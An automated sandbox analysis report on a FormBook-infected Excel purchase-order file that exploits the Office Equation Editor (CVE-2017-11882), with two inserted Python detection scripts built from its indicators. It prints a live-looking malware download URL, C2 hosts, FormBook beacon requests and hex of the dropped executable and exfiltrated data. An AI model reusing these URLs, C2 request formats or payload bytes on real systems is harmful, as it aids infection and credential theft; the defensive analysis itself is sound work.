Analysis Report PO11272020.xlsx

Overview

General Information

Sample Name: PO11272020.xlsx
Analysis ID: 323718
MD5: c2803754fbf19c0073d2dbf2f0fc3871
SHA1: 70b8cad0d3d02eb3dfce050ccaae691e11369416
SHA256: 6774d42ba390417c371d6f46316b3ae3c216c80f8a46b9b3f8906fe9f054f219
Tags: VelvetSweatshop, xlsx

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected FormBook malware
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
.NET source code contains potential unpacker
Binary contains a suspicious time stamp
Drops PE files to the startup folder
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Uses netstat to query active network connections and open ports
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches the installation path of Mozilla Firefox
Stores files to the Windows start menu directory
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

Antivirus detection for URL or domain
Source: http://amachichywsdyjakelogontothecomputewsrty.ydns.eu/amchdoc/vbc.exe Avira URL Cloud: Label: malware
Multi AV Scanner detection for submitted file
Source: PO11272020.xlsx Virustotal: Detection: 35%
Source: PO11272020.xlsx ReversingLabs: Detection: 25%
Yara detected FormBook
Source: Yara match File source: 00000004.00000002.2193415399.00000000036B6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2382057635.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2237322220.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2193296020.0000000003569000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2220261432.0000000003533000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2237505269.0000000000540000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2218859578.0000000003399000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2220136136.00000000034E6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2225048844.0000000000250000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2382110652.0000000000230000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2381962745.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2237415412.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2225094311.0000000000360000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2193435014.0000000003703000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2225125091.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2238667195.0000000000100000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2257843433.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Antivirus or Machine Learning detection for unpacked file
Source: 5.2.vbc.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 8.2.vbc.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe File opened: C:\Users\user\AppData\
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe File opened: C:\Users\user\
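The Exploits entries above are the chain the report's Sigma rules fired on: EQNEDT32.EXE launched with -Embedding, spawning C:\Users\Public\vbc.exe, which then reappears in the per-user Startup folder, while a system binary (chkdsk.exe, process 9 in this report) later carries the C2 traffic. The Python below is an added example, not part of the Joe Sandbox report, that runs those same checks over process-creation and network-connection events of the shape Sysmon produces. The event list is constructed from the paths in this report; the parents of the Startup copy, of chkdsk.exe and of NETSTAT.EXE (which the report lists as "unknown") are assumptions and are marked as such in the code.

```python
"""Process-tree triage modelled on the signatures that fired in this report.
Added example: events are constructed from the report's paths; parent images
the report does not give are assumptions and marked as such."""
import ntpath
from typing import Dict, List, Set, Tuple

EQUATION_EDITOR = r"c:\program files\common files\microsoft shared\equation\eqnedt32.exe"

# Drop locations seen in this run: the exploit writes vbc.exe to
# C:\Users\Public, and the payload copies itself into the per-user
# Startup folder for persistence.
DROP_DIR_MARKERS = (
    "c:\\users\\public\\",
    "\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\",
)

# Binaries with no legitimate reason to open an outbound socket on a
# workstation. The Equation Editor has no network code of its own, and
# FormBook hollows a system binary (chkdsk.exe in this report) and proxies
# its C2 traffic through it.
NO_NETWORK_BINARIES = {"eqnedt32.exe", "chkdsk.exe"}

Event = Dict[str, str]
Alert = Tuple[str, str]


def _norm(path: str) -> str:
    """Lower-case and strip the quotes sandboxes and Sysmon put around images."""
    return path.strip().strip("'\"").lower()


def triage(events: List[Event]) -> List[Alert]:
    """Return (rule, detail) pairs for every event that matches a check."""
    alerts: List[Alert] = []
    for ev in events:
        image = _norm(ev.get("image", ""))
        base = ntpath.basename(image)
        if ev["type"] == "process_create":
            parent = _norm(ev.get("parent_image", ""))
            if parent == EQUATION_EDITOR:
                # Equation Editor never launches child processes legitimately.
                alerts.append(("equation_editor_child", f"{parent} -> {image}"))
            if any(marker in image for marker in DROP_DIR_MARKERS):
                alerts.append(("exec_from_drop_dir", image))
            if base == "netstat.exe" and ntpath.basename(parent) in NO_NETWORK_BINARIES:
                alerts.append(("recon_from_hollowed_process", f"{parent} -> {image}"))
        elif ev["type"] == "network_connect" and base in NO_NETWORK_BINARIES:
            alerts.append(("network_from_system_binary", f"{image} -> {ev['dest']}"))
    return alerts


def chain_stages(alerts: List[Alert]) -> Set[str]:
    """Distinct rule names hit; each is one stage of the document-exploit chain."""
    return {rule for rule, _ in alerts}


def is_exploit_chain(events: List[Event]) -> bool:
    """Verdict: three or more distinct stages on one host within one session."""
    return len(chain_stages(triage(events))) >= 3


# Constructed from this report's process and traffic entries. The parents of
# the Startup copy, of chkdsk.exe and of NETSTAT.EXE are assumptions.
SAMPLE_EVENTS: List[Event] = [
    {"type": "process_create", "image": EQUATION_EDITOR, "parent_image": ""},
    {"type": "network_connect", "image": EQUATION_EDITOR, "dest": "162.251.123.239:80"},
    {"type": "process_create", "image": r"C:\Users\Public\vbc.exe",
     "parent_image": EQUATION_EDITOR},
    {"type": "process_create",
     "image": r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe",
     "parent_image": r"C:\Users\Public\vbc.exe"},                       # assumed parent
    {"type": "process_create", "image": r"C:\Windows\SysWOW64\chkdsk.exe",
     "parent_image": r"C:\Windows\explorer.exe"},                       # assumed parent
    {"type": "network_connect", "image": r"C:\Windows\SysWOW64\chkdsk.exe",
     "dest": "184.168.131.241:80"},
    {"type": "process_create", "image": r"C:\Windows\SysWOW64\NETSTAT.EXE",
     "parent_image": r"C:\Windows\SysWOW64\chkdsk.exe"},                # assumed parent
    {"type": "process_create", "image": r"C:\Windows\System32\notepad.exe",
     "parent_image": r"C:\Windows\explorer.exe"},                       # benign control
]

if __name__ == "__main__":
    for rule, detail in triage(SAMPLE_EVENTS):
        print(f"{rule:32s} {detail}")
    print("exploit chain:", is_exploit_chain(SAMPLE_EVENTS))
```

The chain verdict deliberately requires several independent stages rather than one hit: a lone "executable started from C:\Users\Public" is common in installers, but combined with an Equation Editor child and a system binary opening a socket it matches only this kind of document exploit. On a real EDR feed the same checks apply to the equivalent Sysmon event IDs 1 (process create) and 3 (network connect).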

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\Public\vbc.exe Code function: 4x nop then pop edi 5_2_00417D4B
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 4x nop then pop edi 8_2_00417D4B
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 4x nop then pop edi 9_2_00097D4B
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: amachichywsdyjakelogontothecomputewsrty.ydns.eu
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 162.251.123.239:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 162.251.123.239:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 91.195.241.137:80 -> 192.168.2.22:49167
Uses netstat to query active network connections and open ports
Source: unknown Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK
Date: Fri, 27 Nov 2020 11:15:42 GMT
Server: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38
Last-Modified: Thu, 26 Nov 2020 18:13:37 GMT
ETag: "62600-5b50680b5ce8d"
Accept-Ranges: bytes
Content-Length: 402944
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload
Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 f5 24 1d e4 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 c2 05 00 00 62 00 00 00 00 00 00 52 e1 05 00 00 20 00 00 00 00 06 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 06 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 ff e0 05 00 4f 00 00 00 00 00 06 00 1c 5e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 06 00 0c 00 00 00 68 e0 05 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 60 c1 05 00 00 20 00 00 00 c2 05 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 1c 5e 00 00 00 00 06 00 00 60 00 00 00 c4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 06 00 00 02 00 00 00 24 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 33 e1 05 00 00 00 00 00 48 00 00 00 02 00 05 00 88 61 00 00 b0 2c 00 00 03 00 00 00 20 00 00 06 38 
8e 00 00 30 52 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 02 00 11 01 00 00 00 00 00 00 02 14 7d 01 00 00 04 02 16 7d 02 00 00 04 02 16 7d 03 00 00 04 02 16 7d 04 00 00 04 02 16 7d 05 00 00 04 02 22 00 00 00 00 7d 06 00 00 04 02 22 00 00 00 00 7d 07 00 00 04 02 22 00 00 00 00 7d 08 00 00 04 02 22 00 00 00 00 7d 09 00 00 04 02 22 00 00 00 00 7d 0a 00 00 04 02 22 00 00 00 00 7d 0b 00 00 04 02 22 00 00 00 00 7d 0c 00 00 04 02 22 00 00 00 00 7d 0d 00 00 04 02 16 7d 0e 00 00 04 02 16 7d 0f 00 00 04 02 23 00 00 00 00 00 00 00 00 7d 10 00 00 04 02 16 7d 11 00 00 04 02 16 7d 12 00 00 04 02 16 7d 13 00 00 04 02 16 7d 14 00 00 04 02 16 7d 15 00 00 04 02 16 7d 16 00 00 04 02 16 7d 17 00 00 04 02 16 7d 18 00 00 04 02 16 7d 19 00 00 04 02 16 7d 1a 00 00 04 02 16 7d 1b 00 00 04 02 16 7d 1c 00 00 04 02 16 7d 1d 00 00 04 02 14 7d 1f 00 00 04 02 28 10 00 00 0a 00 00 15 28 11 00 00 0a 00 02 28 0e 00 00 06 00 2a 92 00 02 7b 33 00 00 04 28 12 0
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /zsh/?bF=yL9uBTbbG78KoSpXRM0AXioxGrUEzFPLco0s68NkbehqPfZZENvYiAeYWN1dA1cuKz052A==&hhD4=gXzh_b&sql=1 HTTP/1.1
Host: www.gedefo.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Source: global traffic HTTP traffic detected: GET /zsh/?bF=i/oKhvMZx1zIcgxaF4gHwE4fcf1Ed7aIZ1X+q+iFiuDuW5GIUnLBCT9kDanHyBtFc5puMA==&hhD4=gXzh_b&sql=1 HTTP/1.1
Host: www.letstalkop.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
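The two GET check-ins above and the POST /zsh/ upload recorded later in this section are FormBook's C2 pattern, and the /amchdoc/vbc.exe fetch with an application/x-msdownload response is the stage-one download. The Python below is an added example, not part of the Joe Sandbox report, that runs those checks over request/response pairs. The exchanges are reconstructed from the report's own "HTTP traffic detected" entries with bodies truncated; the benign control request is invented for contrast.

```python
"""HTTP-level triage for the pattern in this report: a PE fetched over plain
HTTP, then FormBook's GET check-in (three query parameters ending in sql=1,
no User-Agent, Connection: close) and its POST upload to the same C2 path.
Added example; exchanges are reconstructed from the report with bodies cut."""
import re
from typing import Any, Dict, List, Optional, Tuple

B64ISH = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
Message = Dict[str, Any]


def parse_message(raw: bytes) -> Message:
    """Split a request or response into start line, lower-cased header map and
    raw body. No URL decoding on purpose: the beacon's first parameter is raw
    base64 and a '+' inside it must survive intact."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"start": lines[0], "headers": headers, "body": body}


def _query_params(target: str) -> List[Tuple[str, str]]:
    _, _, query = target.partition("?")
    return [tuple(p.partition("=")[::2]) for p in query.split("&") if p]


def formbook_get_beacon(req: Message) -> Optional[str]:
    """Name of the payload parameter if `req` has the GET check-in shape seen in
    this report (GET /zsh/?bF=<base64>&hhD4=<token>&sql=1), else None."""
    method, target, _ = req["start"].split(" ", 2)
    if method != "GET":
        return None
    params = _query_params(target)
    if len(params) != 3 or params[2] != ("sql", "1"):
        return None
    (name, blob), (_, token), _ = params
    if len(blob) < 40 or not B64ISH.match(blob) or not 4 <= len(token) <= 8:
        return None
    h = req["headers"]
    if "user-agent" in h or h.get("connection", "").lower() != "close":
        return None
    return name


def formbook_post_beacon(req: Message, param: str) -> bool:
    """POST whose urlencoded body opens with the GET's parameter name and whose
    Origin and Referer point back at the C2 host, as the report's POST /zsh/ does."""
    method = req["start"].split(" ", 1)[0]
    h = req["headers"]
    if method != "POST" or "x-www-form-urlencoded" not in h.get("content-type", ""):
        return False
    host = h.get("host", "")
    if not host or host not in h.get("origin", "") or host not in h.get("referer", ""):
        return False
    return req["body"].partition(b"=")[0] == param.encode("latin-1")


def pe_download(resp: Optional[Message]) -> bool:
    """Executable served over HTTP: labelled application/x-msdownload, or the
    body opens with the MZ DOS header whatever the server claims."""
    if resp is None:
        return False
    ctype = resp["headers"].get("content-type", "").lower()
    return ctype.startswith("application/x-msdownload") or resp["body"][:2] == b"MZ"


def triage(session: List[Tuple[bytes, Optional[bytes]]]) -> List[str]:
    """Walk (request, response) pairs in capture order. The POST rule is keyed
    on the parameter name learned from an earlier GET beacon in the session."""
    findings: List[str] = []
    beacon_param: Optional[str] = None
    for raw_req, raw_resp in session:
        req = parse_message(raw_req)
        resp = parse_message(raw_resp) if raw_resp else None
        host = req["headers"].get("host", "?")
        if pe_download(resp):
            findings.append(f"pe_download {host}{req['start'].split(' ')[1]}")
        param = formbook_get_beacon(req)
        if param:
            beacon_param = param
            findings.append(f"formbook_get_beacon {host} param={param}")
        if beacon_param and formbook_post_beacon(req, beacon_param):
            findings.append(f"formbook_post_beacon {host}")
    return findings


# Constructed from the report's entries; bodies truncated, Content-Length kept as logged.
SAMPLE_SESSION: List[Tuple[bytes, Optional[bytes]]] = [
    (b"GET /amchdoc/vbc.exe HTTP/1.1\r\nAccept: */*\r\nAccept-Encoding: gzip, deflate\r\n"
     b"User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0)\r\n"
     b"Host: amachichywsdyjakelogontothecomputewsrty.ydns.eu\r\nConnection: Keep-Alive\r\n\r\n",
     b"HTTP/1.1 200 OK\r\nContent-Length: 402944\r\nContent-Type: application/x-msdownload\r\n\r\n"
     b"MZ\x90\x00\x03\x00\x00\x00"),
    (b"GET /zsh/?bF=i/oKhvMZx1zIcgxaF4gHwE4fcf1Ed7aIZ1X+q+iFiuDuW5GIUnLBCT9kDanHyBtFc5puMA=="
     b"&hhD4=gXzh_b&sql=1 HTTP/1.1\r\nHost: www.letstalkop.com\r\nConnection: close\r\n\r\n"
     b"\x00\x00\x00\x00\x00\x00\x00", None),
    (b"POST /zsh/ HTTP/1.1\r\nHost: www.gedefo.com\r\nConnection: close\r\nContent-Length: 261372\r\n"
     b"Cache-Control: no-cache\r\nOrigin: http://www.gedefo.com\r\n"
     b"User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko\r\n"
     b"Content-Type: application/x-www-form-urlencoded\r\nAccept: */*\r\n"
     b"Referer: http://www.gedefo.com/zsh/\r\n\r\nbF=6pxUf3XRYf0MoRoAO84WJH81A4My4kaKOepO1ug", None),
    (b"GET /search?q=test&src=ie&sql=1 HTTP/1.1\r\nHost: www.example.com\r\n"
     b"User-Agent: Mozilla/5.0\r\nConnection: keep-alive\r\n\r\n",
     b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<html>"),
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_SESSION):
        print(finding)
```

The GET rule matches the shape (three parameters, a long base64 blob, the constant sql=1, a missing User-Agent and Connection: close) rather than the /zsh/ path or the bF and hhD4 names, since those differ from build to build. Keying the POST rule on the parameter name learned from an earlier GET keeps it from firing on ordinary form posts; on a proxy log that records no bodies, drop the body comparison and alert on the GET shape alone.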
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 184.168.131.241
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: SEDO-ASDE
Source: Joe Sandbox View ASN Name: UNREAL-SERVERSUS
Source: Joe Sandbox View ASN Name: AS-26496-GO-DADDY-COM-LLCUS
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CD9B33F8.emf
Source: global traffic HTTP traffic detected: GET /amchdoc/vbc.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: amachichywsdyjakelogontothecomputewsrty.ydns.eu
Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /zsh/?bF=yL9uBTbbG78KoSpXRM0AXioxGrUEzFPLco0s68NkbehqPfZZENvYiAeYWN1dA1cuKz052A==&hhD4=gXzh_b&sql=1 HTTP/1.1
Host: www.gedefo.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Source: global traffic HTTP traffic detected: GET /zsh/?bF=i/oKhvMZx1zIcgxaF4gHwE4fcf1Ed7aIZ1X+q+iFiuDuW5GIUnLBCT9kDanHyBtFc5puMA==&hhD4=gXzh_b&sql=1 HTTP/1.1
Host: www.letstalkop.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000006.00000000.2203741293.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown DNS traffic detected: queries for: amachichywsdyjakelogontothecomputewsrty.ydns.eu
Source: unknown HTTP traffic detected: POST /zsh/ HTTP/1.1
Host: www.gedefo.com
Connection: close
Content-Length: 261372
Cache-Control: no-cache
Origin: http://www.gedefo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.gedefo.com/zsh/
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Data Raw: 62 46 3d 36 70 78 55 66 33 58 52 59 66 30 4d 6f 52 6f 41 4f 38 34 57 4a 48 38 31 41 34 4d 79 34 6b 61 4b 4f 65 70 4f 31 75 67 2d 54 75 41 76 49 39 51 43 4b 34 33 48 35 67 71 58 4b 61 74 74 59 42 38 64 50 44 41 6c 31 39 69 75 66 61 4d 6f 69 74 5a 64 59 77 54 6a 71 6b 6d 38 6e 68 4b 30 32 54 4b 5f 6b 4d 50 47 74 42 77 6a 49 62 52 78 69 54 34 69 6c 7a 47 71 5a 76 56 78 6c 74 74 67 69 66 58 6f 61 41 7e 41 4c 62 62 44 50 75 4d 74 56 34 4b 30 35 49 44 45 38 6c 79 6c 43 36 41 78 39 55 52 4b 62 54 74 5f 68 30 78 6c 49 37 6f 64 72 42 65 61 4b 34 62 72 51 6d 58 43 31 39 57 39 4a 75 6a 70 6b 48 4a 4c 56 4b 65 6e 57 34 62 39 43 63 6c 6e 6e 68 6b 46 47 2d 49 50 6e 52 32 76 74 35 66 6c 7a 44 4f 73 4f 46 55 39 67 63 72 49 30 33 62 64 47 31 78 55 7e 41 64 4e 57 73 28 6f 68 70 79 73 6c 2d 4c 6a 41 67 4c 50 75 42 77 50 5a 76 59 37 7a 5a 4c 65 68 59 54 4d 37 65 41 45 36 64 53 79 4c 68 49 31 52 6f 77 64 78 58 6d 2d 4c 48 34 69 6e 38 61 65 66 65 53 6e 37 36 78 61 37 6a 43 49 38 6c 4b 33 34 73 59 63 4b 35 53 4b 6f 4a 4c 56 34 73 34 67 72 2d 32 69 35 76 56 30 46 66 4a 54 72 57 55 5a 34 57 30 78 79 44 6a 71 77 63 32 45 78 6c 35 78 4f 35 35 48 61 52 77 79 35 6c 50 6c 73 49 65 49 31 41 62 31 6f 49 62 47 75 7a 56 78 34 6e 5a 4a 6c 4b 51 64 67 48 6b 32 4d 2d 37 7a 69 76 58 79 54 68 65 4a 33 37 57 39 49 48 7a 49 77 33 6e 68 66 77 49 67 47 34 71 54 45 2d 36 68 61 41 39 73 63 4d 59 55 41 63 39 79 6e 53 67 57 56 67 46 53 61 35 67 38 41 6c 73 4f 64 33 5a 6a 70 66 42 47 4d 38 4c 66 70 45 6b 55 6a 46 52 48 28 75 31 4a 63 6e 43 76 36 4e 28 64 37 39 73 65 50 4e 33 61 67 50 34 34 61 74 70 64 7e 4b 64 
66 6d 2d 44 6e 48 75 72 4c 6a 71 36 31 67 75 4b 61 42 65 49 4b 65 39 62 42 6c 7a 71 71 66 36 6c 75 6c 45 63 7a 72 72 6e 4b 57 34 67 37 78 45 72 36 73 72 49 6b 5a 79 48 68 47 32 77 51 42 63 67 74 63 32 49 55 68 30 38 4b 50 56 42 4a 37 44 49 71 44 56 4f 70 38 5f 66 7a 75 6d 45 56 7e 53 43 6d 28 6b 6c 43 34 4b 4c 53 7e 69 77 78 46 2d 74 4c 72 66 59 54 79 66 32 6c 5a 4e 47 4e 6a 56 6b 47 79 4c 37 58 4b 67 7e 73 6e 45 4f 63 57 4e 42 38 79 79 35 4b 68 44 68 61 44 6e 37 43 4e 4e 6a 45 4a 4e 4a 65 7e 50 41 49 50 58 79 59 62 49 45 71 46 4a 6c 78 7e 54 4a 35 78 56 69 32 4c 39 55 39 62 42 62 7a 33 64 64 6f 4a 53 30 34 4f 73 54 36 72 46 78 5a 54 41 63 58 4f 4d 76 51 54 79 49 61 73 79 45 4a 66 76 77 6c 75 72 42 4d 53 34 69 39 61 4a 39 50 42 38 4e 35 6f 6f 79 69 6c 71 65 79 35 53 78 6e 5a 33 47 61 54 69 54 48 75 43 41 4b 75 48 32 33 4e 76 5a 33 7a 79 71 36 4b 7a 63 41 50 67 31 6c 73 7a 28 42 6a 48 76 59 70 77 5a 6e 58 39 74 59 6c 4f 67 49 79 67 72 51 46 47 33 70 45 63 48 47 4c 42 59 38 4e 46 71 